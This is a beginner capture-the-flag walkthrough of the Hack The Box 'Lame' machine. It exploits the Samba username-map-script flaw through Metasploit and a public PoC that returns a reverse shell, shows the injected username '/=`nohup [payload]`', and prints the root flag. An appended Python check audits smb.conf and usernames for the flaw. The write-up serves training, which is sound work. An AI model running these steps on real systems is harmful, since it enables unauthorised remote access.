LAME — HTB
Lame is a beginner-friendly machine based on a Linux platform.
IP: 10.10.10.3
This machine can be exploited both with Metasploit and by a manual approach.
Recon
Nmap:
- Used -Pn (skip host discovery) because without it nmap was not giving proper output.
- Two services where exploitation can be done:
  * vsFTPd 2.3.4
  * Samba 3.0.20
FTP exploitation:
- Using vsFTPd 2.3.4:
  * Make an FTP connection: ftp 10.10.10.3
  * Log in as user anonymous
  * Enter any password. You will be able to log in, but nothing happens manually.
  * Reference: How to use FTP (Beginners Guide) — Qode Interactive
- For FTP, used Metasploit:
  * The exploit ran successfully but no session was returned. Tried again and it failed again.
PYTHON SCRIPT:
Some Googling led me to this GitHub repo with a Python POC for the exploit. I can get a shell easily by following the "install" instructions and then running the script:
- sudo apt install python python-pip
- pip install --user pysmb
- git clone https://github.com/amriunix/CVE-2007-2447.git
- $ python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
  * RHOST -- the target address
  * RPORT -- the target port (TCP 139)
  * LHOST -- the listen address
  * LPORT -- the listen port
- Start a netcat listener on the port you specified.
- cat root/root.txt — get the flag
Samba Exploitation: Metasploit
Samba is an extremely useful networking tool for anyone who has both Windows and Unix systems on his network. Running on a Unix system, it allows Windows to share files and printers on the Unix host, and it also allows Unix users to access resources shared by Windows systems.
Samba's smbclient tool provides an FTP-like interface on the command line.
Exploit: This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell metacharacters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!
- We can exploit both manually and with Metasploit.
- First, using Metasploit:
  * Open msfconsole
  * search samba 2.3.0
  * use 14 or use exploit/multi/samba/usermap_script
  * set payload cmd/unix/reverse
  * show options
  * Set RHOSTS and LHOST
  * Check the port: it should be 139, as the nmap result shows Samba listening on 139.
  * We receive a session on the victim machine.
- cd root & cat root.txt
- final flag: 256c41e62eac379edf6df4dac5e12d38
Samba exploit: Manual Approach
- For a list of commands: https://www.computerhope.com/unix/smbclien.html
- smbclient -L 10.10.10.3
- To sort out the issue this gave: sudo vi /etc/samba/smb.conf (this is the smbclient config on your own machine)
  * Under the [global] section add: client max protocol = NT1
  * After this change the issue was still displaying.
  * Under the [global] section also set: client min protocol = NT1
  * Issue resolved.
  * smbclient -L 10.10.10.3
- Enumerate the tmp share. Use enum4linux:
  * A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts. Enum4linux is a tool for enumerating information from Windows and Samba systems.
  * Reference: enum4linux | Penetration Testing Tools (kali.org)
- So we are right: we are able to map the /tmp folder. Now we will try to connect to that share.
  * smbclient //10.10.10.3/tmp
  * After login, enter help
  * We can see that a logon command is available, which we can use to log in.
- Samba exploit: after reading this you can understand a little bit more: https://www.exploit-db.com/exploits/16320
  The key part is in def exploit at the bottom. It creates an SMB session using:
  * username = /=`nohup [payload]`
  * password = random 16 characters
  * domain = user-provided domain
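As an added example (not from this write-up, the PoC repo, or Samba's own code), the Python below audits an smb.conf for the "username map script" option that makes this attack possible and checks a username for the shell metacharacters the vulnerable versions failed to reject; the config fragment, the script path and the SHELL_META set are constructed assumptions.

```python
"""Added example: audit a Samba smb.conf for the option behind CVE-2007-2447
and validate usernames before any shell-invoked script could see them."""

# Constructed smb.conf fragment; the script path is a made-up placeholder.
SAMPLE_SMB_CONF = """
# constructed sample, not the HTB machine's real config
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   username map script = /etc/samba/scripts/mapusers.sh

[tmp]
   path = /tmp
   writable = yes
"""

# Assumed conservative set of characters the shell treats specially.
SHELL_META = set("`$|;&<>()\\\"'*?{}[]~#\n\t ")


def parse_smb_conf(text):
    """Minimal parser for Samba's INI-style config -> {section: {key: value}}.
    Lines beginning with '#' or ';' are comments; keys are lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def audit_username_map_script(conf):
    """Return a finding if the option that runs before authentication is set."""
    script = conf.get("global", {}).get("username map script")
    if script is None:
        return []
    return ["[global] username map script = %s: Samba 3.0.20-3.0.25rc3 runs "
            "it via a shell with the unauthenticated username (CVE-2007-2447); "
            "remove the option or upgrade Samba" % script]


def username_is_safe(name):
    """Reject empty names and any shell metacharacter before a script sees it."""
    return bool(name) and not (set(name) & SHELL_META)


if __name__ == "__main__":
    for finding in audit_username_map_script(parse_smb_conf(SAMPLE_SMB_CONF)):
        print(finding)
```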
Conclusion & learning:
- Samba in detail and its exploitation.
- enum4linux tool.
- FTP exploitation.